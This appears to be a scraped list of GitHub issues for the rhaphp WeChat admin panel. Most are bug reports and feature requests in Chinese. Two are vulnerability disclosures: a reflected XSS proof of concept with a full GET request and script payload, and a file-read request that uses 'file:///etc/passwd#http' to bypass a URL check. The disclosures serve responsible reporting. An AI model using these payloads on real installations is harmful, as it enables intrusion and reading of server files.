geesondog / rhaphp Goto Github PK

现在的数据库配置是写死在config/database.php文件里面的，不利于开发与部署，建议采用.env进行配置，大概代码如下：
config/database.php文件部分修改：

use think\facade\Env;

return [
// 数据库类型
'type'            => 'mysql',
'hostname'        => Env::get('database.hostname', '127.0.0.1'),
// 数据库名
'database'        => Env::get('database.database', ''),
// 用户名
'username'        => Env::get('database.username', 'root'),
// 密码
'password'        => Env::get('database.password', ''),
// 端口
'hostport'        => Env::get('database.hostport', ''),
];

站点目录下新增.env.example文件：

[common]
app_debug = true
app_trace = false

[database]
hostname = 数据库地址
database = 数据库名称
username = 账号
password = 密码
hostport = 3306
prefix   = rh_

部署的时候直接执行 cp .env.example .env，然后再根据环境配置 .env

Hello 👋

I run a security community that finds and fixes vulnerabilities in OSS. A researcher (@0xROI) has found a potential issue, which I would be eager to share with you.

Could you add a SECURITY.md file with an e-mail address for me to send further details to? GitHub recommends a security policy to ensure issues are responsibly disclosed, and it would help direct researchers in the future.

Looking forward to hearing from you 👍

(cc @huntr-helper)

在菜单添加了扫码推事件，但是好像扫码后并没有收到事件推送

index.php为什么不放在public下面，现在的位置岂不是可以访问所有的目录。

新关注人数实际为净增人数

admin能管理所有公众号
新添加的成员必须指定绑定公众号
非admin账号登录时将（当前公众号）自动切到绑定的公众号
并隐藏掉（ 切换公众号、系统管理）两个菜单

公众号->自动回复 添加消息为图片类型时，上传图片为永久素材，无法上传

打开网站首页后404错误？权限给了777

app\common\model\MpMsg.php中函数messageListByGroup sql查询报错
$msgList = $this->where(['status' => $status, 'mpid' => $mid])->field('openid,count(msg_id) as msg_total')->group('openid')->order('msg_id DESC')->paginate(15);
此处order by msg_id有问题，order by只能是field中的字段

另建议不要在循环中查库，一次批量查出再在循环中组装

如何联系您？想有偿用一下你们商家入驻小程序的后台 [email protected]

查询显示菜单的时候mp->menu方法加上条件
->order('sort ASC')

POC - XSS
Parameters : keyword
Attack Pattern : keyword=1234%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E
GET Request: http://10.21.42.29:81/mp/mp/autoreply.html

===================================================================

GET /mp/mp/autoreply.html?search_type=1&keyword=1234%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E HTTP/1.1
Host: 10.21.42.29:81
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://10.21.42.29:81/mp/mp/autoreply.html
Connection: close
Cookie: PHPSESSID=k2h7v7f0cflanglepjtsnr0jv6; think_admin=think%3A%7B%22id%22%3A%221%22%2C%22admin_name%22%3A%22admin123%22%2C%22password%22%3A%22fd9f12b2d09b5afd461f1a05cb66c8c6%22%2C%22status%22%3A%221%22%2C%22ip%22%3A%22127.0.0.1%22%2C%22last_time%22%3A%221550625853%22%2C%22rand_str%22%3A%22ZiEydp%22%2C%22admin_id%22%3A%221%22%7D
Upgrade-Insecure-Requests: 1

===================================================================

Vulnerability Code: https://github.com/geesondog/rhaphp/blob/master/application/mp/controller/Show.php#L21-L23

The vulnerability lies in the use of the strpos function instead of the substr function to determine whether the incoming value contains the keywords "http" or "https". This allows for certain methods to bypass the check.

Below is an example of how the vulnerability can be exploited:

/mp/Show/image?url=file:///etc/passwd#http

This can successfully read any file on the server.

*.Com/install跳转404？伪静态已经开启。

希望添加第三方登录授权模式授权管理公众号